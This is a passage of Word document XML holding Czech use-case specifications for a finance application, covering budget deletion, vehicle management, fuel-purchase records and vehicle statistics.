      <w:r>
        <w:t>UC umožňuje uživateli odstranit existující rozpočet ze systému.</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2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uživatel v seznamu rozpočtů vybere rozpočet, který </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>si přeje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> odstranit a zvolí u něj možnost odstranit rozpočet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uživatele informuje o nenávratnosti tohoto kroku a vyžádá si potvrzení uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel potvrdí svůj úmysl odstranit vybraný rozpočet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="00EA15C6" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vybraný rozpočet je odstraněn ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="009A0BD8" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel nepotvrdí svůj úmysl odstranit vybraný rozpočet, tak UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Rozpočet je odstraněn ze systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C06F82" w:rsidRDefault="00C06F82">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc387327858"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa vozidel</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t xml:space="preserve">V této podkapitole jsou popsány scénáře, které se týkají správy vozidel. Pokud uživatel eviduje v systému vozidlo, může </w:t>
      </w:r>
      <w:r w:rsidR="00E477D9">
        <w:t>sledovat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve">s ním související </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">náklady. Každé vozidlo je spojeno se štítkem, kterým uživatel označuje transakce </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>týkající se</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vozidl</w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UC27: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Vytvoření nového vozidla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>UC umožňuje uživateli vytvořit nové vozidlo.</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3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel zvolí možnost vytvoření nového vozidla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel vyplní název vozidla a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>ystém ověří, zda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> neexistuje vozidlo se stejným názvem a vytvoří nové vozidlo a nový štítek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému již existuje vozidlo se stejným názvem, je na tuto skutečnost uživatel upozorněn a musí zvolit jiný název. UC dále pokračuje krokem 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému již existuje štítek se stejným názvem</w:t>
      </w:r>
      <w:r w:rsidR="00516FAD">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako je název vozidla, bude vozidlo spojeno s</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>ním a nedojde k</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>vytvoření nového štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="003601D3" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Nové vozidlo a štítek se stejným názvem jsou uložené v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC28: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Editace vozidla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>UC umožňuje uživateli upravit existující vozidlo.</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4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu vozidel vybere vozidlo, které </w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>si přeje</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> upravit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář</w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t xml:space="preserve"> umožňující</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> změn</w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> názv</w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vozidla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel změní název a odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00710DAF" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém ověří, zda</w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t xml:space="preserve"> neexistuje vozidlo a štítek se stejným názvem a změní název vozidla a jemu přiřazeného štítku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému již existuje vozidlo s</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>novým názvem, je na tuto skutečnost uživatel upozorněn a musí zvolit jiný název. UC dále pokračuje krokem 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému již existuje štítek se stejným názvem</w:t>
      </w:r>
      <w:r w:rsidR="00710DAF">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jako je nový název vozidla, je na tuto skutečnost uživatel upozorněn a musí zvolit jiný název. UC dále pokračuje krokem 3 základního toku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="00EA15C6" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Vozidlo a přiřazený štítek mají nový název.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC29: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Odstranění vozidla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>UC umožňuje uživateli odstranit existující vozidlo ze systému.</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E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">seznamu vozidel vybere vozidlo, které </w:t>
      </w:r>
      <w:r w:rsidR="005828F9">
        <w:t xml:space="preserve">si přeje </w:t>
      </w:r>
      <w:r>
        <w:t>odstranit a zvolí u něj možnost odstranit vozidlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém uživatele informuje o nenávratnosti tohoto kroku a vyžádá si potvrzení uživatele.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel potvrdí svůj úmysl odstranit vybrané vozidlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="00EA15C6" w:rsidRDefault="00E9530C" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Systém odstraní vybrané vozidlo a </w:t>
      </w:r>
      <w:r w:rsidR="005828F9">
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r>
        <w:t>ním spojený štítek.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Alternativní tok 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud uživatel nepotvrdí svůj úmysl odstranit vybrané vozidlo, tak UC končí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r>
        <w:t>Alternativní tok 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="009A0BD8" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Pokud existuje alespoň jedna transakce označená štítkem vozidla, tak nedojde k</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>odstranění štítku a ten</w:t>
      </w:r>
      <w:r w:rsidR="005828F9">
        <w:t xml:space="preserve"> tedy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zůstává nadále v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Vozidlo je odstraněno ze systému. Štítek vozidla je odstraněn</w:t>
      </w:r>
      <w:r w:rsidR="005828F9">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pokud jím nejsou označené žádné transakce.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Ref385937859"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Ref387312234"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC30: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Evidence tankování vozidla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t xml:space="preserve">UC umožňuje evidovat </w:t>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:t xml:space="preserve">tankování pohonných hmot vozidla. Tento scénář rozšiřuje scénář </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:instrText xml:space="preserve"> REF _Ref384580658 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC16: Vytvoření nové transakce</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:t>.</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 xml:space="preserve">Uživatel </w:t>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:t>zahájil</w:t>
      </w:r>
      <w:r w:rsidR="00276193" w:rsidRPr="00276193">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:t xml:space="preserve">scénář </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:instrText xml:space="preserve"> REF _Ref384580658 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t>UC16: Vytvoření nové transakce</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:t xml:space="preserve"> a v</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00276193">
        <w:t>systému eviduje alespoň jedno vozidlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00276193" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém k</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>formuláři pro vytvoření transakce vygeneruje navíc formulář pro evidenci tankování pohonných hmot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00276193" w:rsidRDefault="00276193" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel do formuláře zadá počet natankovaných litrů nebo cenu za litr (druhá hodnota je vždy dopočítána automaticky). Dále vybere vozidlo, kterého se tankování týká a zaznamená, zda se jedná o natankování plné nádrže a pokud ano, tak zadá stav tachometru vozidla. Nakonec uživatel odešle formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00276193" w:rsidRPr="00EA15C6" w:rsidRDefault="00276193" w:rsidP="006D1942">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém kromě vytvoření transakce zaznamená údaj o tankování pohonných hmot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky po dokončení</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00276193" w:rsidRPr="00276193" w:rsidRDefault="00276193" w:rsidP="00276193">
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="00C06F82">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému je evidováno tankování pohonných hmot vybraného vozidla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004954AE" w:rsidRDefault="004954AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00C06F82" w:rsidP="00C06F82">
      <w:pPr>
        <w:pStyle w:val="Nadpis4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">UC31: </w:t>
      </w:r>
      <w:r w:rsidR="00E9530C">
        <w:t>Zobrazení statistik vozidla</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="002F5FD7" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t xml:space="preserve">UC </w:t>
      </w:r>
      <w:r w:rsidR="00962CD2">
        <w:t>umožňuje uživateli zobrazit statistiky vybraného vozidla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="008F1CD3" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Aktéři</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Zaregistrovaný uživatel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Podmínky pro spuštění</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRPr="00173253" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:r>
        <w:t>Uživatel je přihlášen do systému.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00E9530C" w:rsidP="00E9530C">
      <w:pPr>
        <w:pStyle w:val="Podnadpis5"/>
      </w:pPr>
      <w:r w:rsidRPr="008F1CD3">
        <w:t>Základní tok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E9530C" w:rsidRDefault="00962CD2" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel v seznamu vozidel vybere vozidlo a zvolí možnost zobraz</w:t>
      </w:r>
      <w:r w:rsidR="005508A8">
        <w:t>ení</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> statistik.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962CD2" w:rsidRDefault="00962CD2" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Systém vygeneruje formulář.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962CD2" w:rsidRDefault="00962CD2" w:rsidP="00500D6F">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
